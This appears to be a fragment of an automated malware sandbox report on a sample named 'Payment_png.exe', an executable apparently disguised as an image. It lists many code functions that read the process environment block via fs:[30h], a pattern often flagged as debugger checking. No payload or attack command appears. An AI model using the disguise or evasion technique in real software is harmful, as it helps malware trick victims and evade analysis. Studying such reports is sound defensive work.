      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4614FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E423540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E453D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E42A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E458DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E434257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4253CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4253CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E475BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E471074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E474015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E474015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]
